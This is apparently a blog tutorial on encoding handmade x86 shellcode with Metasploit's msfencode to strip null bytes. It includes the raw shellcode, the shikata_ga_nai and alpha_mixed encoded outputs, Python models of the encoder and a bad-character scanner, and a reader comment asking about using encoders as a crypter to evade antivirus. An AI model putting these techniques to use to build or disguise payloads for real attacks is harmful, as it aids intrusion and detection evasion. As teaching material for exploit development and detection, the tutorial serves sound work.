Encoding your handmade shell code using Metasploit Encoder

Encoding shellcode matters in real-world exploitation because handmade shellcode may contain null bytes or other "bad characters". Either the transport protocol or the target application
can be sensitive to such bad characters, which break the shellcode in various ways.
Bad characters can mostly be eliminated by encoding the payload.

If you use shellcode that ships with the Metasploit framework, you do not have to worry about encoding: Metasploit encodes the payload by default during exploitation.
But in many situations you use your own shellcode in an exploit, and then that shellcode must be free of bad characters.
Metasploit can do the encoding of your handmade shellcode for you.

To list all encoders in the Metasploit framework, run ./msfencode -l (here limited to the x86 architecture with -a x86):
root@bt:~#./msfencode -l -a x86 

Framework Encoders (architectures: x86)
=======================================

Name                    Rank       Description
----                    ----       -----------
generic/none            normal     The "none" Encoder
x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
x86/countdown           normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
x86/nonalpha            low        Non-Alpha Encoder
x86/nonupper            low        Non-Upper Encoder
x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit   manual     Single Static Bit
x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

The default encoder in Metasploit is x86/shikata_ga_nai.
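The table describes x86/shikata_ga_nai as a polymorphic XOR additive feedback encoder. The following is an added example, not code from the post or from Metasploit, that models that byte transform in Python so the two words are concrete: "additive feedback" means the key is updated with each decoded dword, and "polymorphic" means a fresh random key is drawn every run, so the encoded body differs each time. It also shows the search an encoder performs before it reports "succeeded": both the encoded body and the key itself (which ends up inside the decoder stub) must avoid the bad characters. The real decoder stub (its instructions, register choice and variations) is not reproduced, the feedback rule key += decoded_dword and the 0x90 padding are assumptions of this model, and the sample input is the first 16 bytes of the post's handmade shellcode.

```python
# Added example (not from the original post or Metasploit): a byte-level
# model of a XOR additive feedback encoder, the scheme x86/shikata_ga_nai is
# named after. Assumptions: feedback rule key += decoded dword, little-endian
# dwords, 0x90 padding. No decoder stub is generated here.
import random
import struct

# Constructed sample input: first 16 bytes of the post's handmade shellcode,
# which contain a null byte at offset 4.
SAMPLE = b"\x68\x6c\x61\x6e\x00\x68\x43\x6f\x72\x65\x89\xe3\x68\x61\x6e\x20"

MASK = 0xFFFFFFFF


def pad_to_dword(payload: bytes, pad: bytes = b"\x90") -> bytes:
    """Pad to a multiple of 4 so the body can be processed dword by dword."""
    remainder = len(payload) % 4
    return payload if remainder == 0 else payload + pad * (4 - remainder)


def xor_additive_encode(payload: bytes, key: int) -> bytes:
    """Encode: e_i = p_i ^ key_i ; key_{i+1} = key_i + p_i (mod 2^32)."""
    if len(payload) % 4:
        raise ValueError("payload length must be a multiple of 4")
    out = bytearray()
    for off in range(0, len(payload), 4):
        (plain,) = struct.unpack_from("<I", payload, off)
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & MASK  # feedback: next key depends on decoded dword
    return bytes(out)


def xor_additive_decode(encoded: bytes, key: int) -> bytes:
    """Inverse of xor_additive_encode; mirrors what the decoder stub computes."""
    if len(encoded) % 4:
        raise ValueError("encoded length must be a multiple of 4")
    out = bytearray()
    for off in range(0, len(encoded), 4):
        (enc,) = struct.unpack_from("<I", encoded, off)
        plain = enc ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK
    return bytes(out)


def contains_bad(buf: bytes, badchars: bytes) -> bool:
    """True if any byte of buf is in the bad-character set."""
    return any(b in badchars for b in buf)


def key_is_clean(key: int, badchars: bytes) -> bool:
    """The key bytes live inside the decoder stub, so they must be clean too."""
    return not contains_bad(struct.pack("<I", key), badchars)


def find_clean_key(payload: bytes, badchars: bytes, attempts: int = 100000, seed=None):
    """Random key search, as an encoder does before reporting success.
    Returns (key, encoded_body) or None when no key is found in `attempts` tries
    (a large bad-character set can make this fail)."""
    rng = random.Random(seed)
    body = pad_to_dword(payload)
    for _ in range(attempts):
        key = rng.getrandbits(32)
        if not key_is_clean(key, badchars):
            continue
        encoded = xor_additive_encode(body, key)
        if not contains_bad(encoded, badchars):
            return key, encoded
    return None


if __name__ == "__main__":
    # Two runs with different keys give different bodies for the same input.
    for run in range(2):
        key, encoded = find_clean_key(SAMPLE, b"\x00")
        assert xor_additive_decode(encoded, key) == SAMPLE
        print(f"run {run}: key=0x{key:08x} body={encoded.hex()}")
```

Because the encoded body changes on every run, a byte signature taken from one encoded sample is a poor detection indicator; the decoder stub's structure and the decoded payload in memory are the stable parts, which is why emulation and memory scanning are used to detect encoded payloads.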

Suppose you have just written the following shellcode:
"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
"\x72\x65\x89\xe3\x68\x61\x6e\x20"
"\x00\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
"\x50\x53\x51\x50\x50\xbe\xea\x07"
"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
"\x12\xcb\x81\x7c\xff\xe0";
To encode it, first write the shellcode into a binary file; any scripting language will do.

Here I will use Python. The shellcode is a bytes literal and the file is opened in binary mode, so the null bytes are written unchanged:
# Write the raw shellcode bytes to shellcode.bin for msfencode to read.
shell = (b"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
         b"\x72\x65\x89\xe3\x68\x61\x6e\x20"
         b"\x00\x68\x6f\x72\x65\x6c\x68\x62"
         b"\x79\x20\x43\x68\x6e\x65\x64\x20"
         b"\x68\x6e\x20\x70\x77\x68\x20\x62"
         b"\x65\x65\x68\x68\x61\x76\x65\x68"
         b"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
         b"\x50\x53\x51\x50\x50\xbe\xea\x07"
         b"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
         b"\x12\xcb\x81\x7c\xff\xe0")
with open('shellcode.bin', 'wb') as f:   # binary mode: no newline or encoding translation
    f.write(shell)


After running the script you have a shellcode.bin file, and you are almost done: just run msfencode to encode the shellcode for you (-b lists the bad characters to avoid, -t c asks for C output).

root@bt:~#./msfencode -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)

unsigned char buf[] =
"\xdb\xc9\x29\xc9\xbf\x63\x07\x01\x58\xb1\x14\xd9\x74\x24\xf4"
"\x5b\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\x81\xf2\x69\x34\x24"
"\x93\x69\xac\xe5\x04\x18\x49\x60\x39\xb4\xf0\x1c\x9e\x45\x9b"
"\x8f\xac\x20\x37\x27\x33\xd2\xe7\xf4\xdb\x4a\x8d\x9e\x3b\xfb"
"\x23\x7e\x4c\x8c\xd3\x5e\xce\x17\x41\xf6\x66\xb9\xff\x63\x1f"
"\x60\x6f\x1e\xff\x1b\x8e\xd1\x3f\x4b\x02\x40\x90\x3c\x1a\x88"
"\x17\xf8\x1c\xb3\xfe\x33\x21\x1b\x47\x21\x6a\x1a\xcb\xb9\x8c";
This is the resulting shellcode: free of null bytes and other bad characters, and fully working.

Encode using x86/alpha_mixed

root@bt:~#./msfencode -e x86/alpha_mixed -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/alpha_mixed succeeded with size 218 (iteration=1)

unsigned char buf[] =
"\x89\xe3\xda\xc3\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x58\x42\x4c\x45\x31\x42\x4e\x45\x50\x42\x48\x50\x43\x42"
"\x4f\x51\x62\x51\x75\x4b\x39\x48\x63\x42\x48\x45\x31\x50\x6e"
"\x47\x50\x45\x50\x45\x38\x50\x6f\x43\x42\x43\x55\x50\x6c\x51"
"\x78\x43\x52\x51\x69\x51\x30\x43\x73\x42\x48\x50\x6e\x45\x35"
"\x50\x64\x51\x30\x45\x38\x42\x4e\x45\x70\x44\x30\x50\x77\x50"
"\x68\x51\x30\x51\x72\x43\x55\x50\x65\x42\x48\x45\x38\x45\x31"
"\x43\x46\x42\x45\x50\x68\x42\x79\x50\x6f\x44\x35\x51\x30\x4d"
"\x59\x48\x61\x45\x61\x4b\x70\x42\x70\x46\x33\x46\x31\x42\x70"
"\x46\x30\x4d\x6e\x4a\x4a\x43\x37\x51\x55\x43\x4e\x4b\x4f\x4b"
"\x56\x46\x51\x4f\x30\x50\x50\x4d\x68\x46\x72\x4a\x6b\x4f\x71"
"\x43\x4c\x4b\x4f\x4d\x30\x41\x41";
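Rather than trusting the "succeeded" line, the result can be checked directly. The following is an added example, not part of the original post, that scans a byte string for a bad-character set and reports the offsets of any hits. It is run over the three byte strings copied from the post: the handmade shellcode (two null bytes, at offsets 4 and 16), the x86/shikata_ga_nai output (none; the 27 extra bytes are the decoder stub the encoder prepends) and the x86/alpha_mixed output. It also shows a caveat the post does not mention: the alpha_mixed output is alphanumeric only after a short non-alphanumeric prefix (the stub that locates its own address, which Metasploit emits unless the BufferRegister option is set), so a filter that accepts only letters and digits would still reject the first bytes.

```python
# Added example (not part of the original post): verify encoder output by
# scanning it for bad characters. The three byte strings are copied from the
# post; the functions and the report format are this example's own.
import string

# Handmade shellcode from the post (78 bytes, contains two null bytes).
HANDMADE = (
    b"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
    b"\x72\x65\x89\xe3\x68\x61\x6e\x20"
    b"\x00\x68\x6f\x72\x65\x6c\x68\x62"
    b"\x79\x20\x43\x68\x6e\x65\x64\x20"
    b"\x68\x6e\x20\x70\x77\x68\x20\x62"
    b"\x65\x65\x68\x68\x61\x76\x65\x68"
    b"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
    b"\x50\x53\x51\x50\x50\xbe\xea\x07"
    b"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
    b"\x12\xcb\x81\x7c\xff\xe0"
)

# msfencode x86/shikata_ga_nai output from the post (105 bytes).
SHIKATA = (
    b"\xdb\xc9\x29\xc9\xbf\x63\x07\x01\x58\xb1\x14\xd9\x74\x24\xf4"
    b"\x5b\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\x81\xf2\x69\x34\x24"
    b"\x93\x69\xac\xe5\x04\x18\x49\x60\x39\xb4\xf0\x1c\x9e\x45\x9b"
    b"\x8f\xac\x20\x37\x27\x33\xd2\xe7\xf4\xdb\x4a\x8d\x9e\x3b\xfb"
    b"\x23\x7e\x4c\x8c\xd3\x5e\xce\x17\x41\xf6\x66\xb9\xff\x63\x1f"
    b"\x60\x6f\x1e\xff\x1b\x8e\xd1\x3f\x4b\x02\x40\x90\x3c\x1a\x88"
    b"\x17\xf8\x1c\xb3\xfe\x33\x21\x1b\x47\x21\x6a\x1a\xcb\xb9\x8c"
)

# msfencode x86/alpha_mixed output from the post (218 bytes).
ALPHA = (
    b"\x89\xe3\xda\xc3\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x43\x58\x42\x4c\x45\x31\x42\x4e\x45\x50\x42\x48\x50\x43\x42"
    b"\x4f\x51\x62\x51\x75\x4b\x39\x48\x63\x42\x48\x45\x31\x50\x6e"
    b"\x47\x50\x45\x50\x45\x38\x50\x6f\x43\x42\x43\x55\x50\x6c\x51"
    b"\x78\x43\x52\x51\x69\x51\x30\x43\x73\x42\x48\x50\x6e\x45\x35"
    b"\x50\x64\x51\x30\x45\x38\x42\x4e\x45\x70\x44\x30\x50\x77\x50"
    b"\x68\x51\x30\x51\x72\x43\x55\x50\x65\x42\x48\x45\x38\x45\x31"
    b"\x43\x46\x42\x45\x50\x68\x42\x79\x50\x6f\x44\x35\x51\x30\x4d"
    b"\x59\x48\x61\x45\x61\x4b\x70\x42\x70\x46\x33\x46\x31\x42\x70"
    b"\x46\x30\x4d\x6e\x4a\x4a\x43\x37\x51\x55\x43\x4e\x4b\x4f\x4b"
    b"\x56\x46\x51\x4f\x30\x50\x50\x4d\x68\x46\x72\x4a\x6b\x4f\x71"
    b"\x43\x4c\x4b\x4f\x4d\x30\x41\x41"
)

ALNUM = set(string.ascii_letters.encode() + string.digits.encode())


def find_bad_chars(buf: bytes, badchars: bytes) -> list:
    """Return [(offset, value), ...] for every byte of buf present in badchars."""
    return [(i, b) for i, b in enumerate(buf) if b in badchars]


def non_alnum_offsets(buf: bytes) -> list:
    """Offsets of bytes that are not ASCII letters or digits."""
    return [i for i, b in enumerate(buf) if b not in ALNUM]


def decoder_overhead(original: bytes, encoded: bytes) -> int:
    """Bytes the encoder added on top of the payload (its decoder stub)."""
    return len(encoded) - len(original)


def report(name: str, buf: bytes, badchars: bytes = b"\x00") -> None:
    hits = find_bad_chars(buf, badchars)
    where = ", ".join(f"0x{v:02x}@{i}" for i, v in hits) or "none"
    print(f"{name}: {len(buf)} bytes, bad chars: {where}")


if __name__ == "__main__":
    report("handmade", HANDMADE)
    report("shikata_ga_nai", SHIKATA)
    report("alpha_mixed", ALPHA)
    print("alpha_mixed non-alphanumeric offsets:", non_alnum_offsets(ALPHA))
    print("decoder overhead: shikata_ga_nai", decoder_overhead(HANDMADE, SHIKATA),
          "bytes, alpha_mixed", decoder_overhead(HANDMADE, ALPHA), "bytes")
```

The same scan, with the bad-character set widened to whatever the target filters (for example b"\x00\x0a\x0d"), is the check to run on any encoder output before it goes into an exploit, since msfencode only guarantees the characters listed with -b.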

Comments

  1. Nice article. Is it possible to use these encoders as a kind of crypter? I mean, can I encode my payload using any of these encoders?
